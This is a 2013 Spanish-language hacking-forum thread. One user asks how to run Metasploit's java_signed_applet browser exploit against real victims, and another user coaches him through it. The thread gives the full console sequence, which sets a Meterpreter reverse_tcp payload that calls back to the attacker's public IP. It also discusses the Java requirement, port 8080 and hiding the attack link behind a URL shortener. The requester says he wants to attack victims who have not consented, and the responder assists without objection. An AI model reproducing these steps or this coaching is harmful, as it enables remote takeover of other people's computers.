Sólo texto | Texto con Imágenes

Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: Ricardini en Septiembre 14, 2013, 07:18:39 AM

Título: Metasploit DUDA ataque real !
Publicado por: Ricardini en Septiembre 14, 2013, 07:18:39 AM
buenas bros queria saber sobre este bug java_apllets es como un payload que ataka via internet mediante metasploit pero no lo entiendo ???????????

preguntas del video ?

primero abre los puertos 4444 y 8080
por que abre el puerto 8080 ese puerto no es para proxys o para servidores ?

otra cosa la victima tiene que tener instalado JAVA para que funke el ataque ?

y no entiendo para que sirve este website para crear un servidor ?
http://tinyurl.com/create.php
segun el video pone la ip publica .. como LHOST

cuando lo abro en otra maquina sale asi y no me da session a de cuenta que la web no me diera respuesta o
httt://tinyurl.com/194.123.77.33:8080/ me sale asi en la maquina atacada

(http://imageshack.us/a/img836/992/a0r5.jpg)

ya intente con troyanos y me fue bien quiero hacer esto alguien quien me pueda ayudar hacer el ataque por favor




pasos del ataque :

use exploit/multi/browser/java_signed_applet

show options

set SRVHOST 192.168.1.9

set URIPATH /

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST 194.123.77.33 IP PUBLICA


exploit
Título: Re:metasploit DUDA ataque real !
Publicado por: Snifer en Septiembre 14, 2013, 09:50:59 AM
Bueno primero te diria ponte a leer toda la documentacion necesaria y luego haces tus preguntas ! pero hoy ando de buen humor enserio lee,  te ire respondiendo cada pregunta que hiciste.

por que abre el puerto 8080 ese puerto no es para proxys o para servidores ?

El puerto 8080 es usada para la conexion a tu servidor donde (segun lo que puede hacer el ataque no vi el video) es para que la victima pueda acceder a tu equipo y poder lanzar el exploit.

otra cosa la victima tiene que tener instalado JAVA para que funke el ataque ?

Obvio que si aun mas la version de Java especifica por la cual es afectada con este exploit.

y no entiendo para que sirve este website para crear un servidor ?
http://tinyurl.com/create.php
segun el video pone la ip publica .. como LHOST


Simple el Tinyurl es un acortador de URL el cual puedes realizar algo como esto ->http://tinyurl.com/sniferl4bs (http://tinyurl.com/sniferl4bs)

cuando lo abro en otra maquina sale asi y no me da session a de cuenta que la web no me diera respuesta o
httt://tinyurl.com/194.123.77.33:8080/ me sale asi en la maquina atacada

No es necesario que uses TyniURL para hacer el ataque es mejor que lo hagas sin ello primero para poder probar, segundo tu maquina verifica que tenga Java.

Cualquier duda te la responderemos en el foro.

Regards,
Snifer
Sólo texto | Texto con Imágenes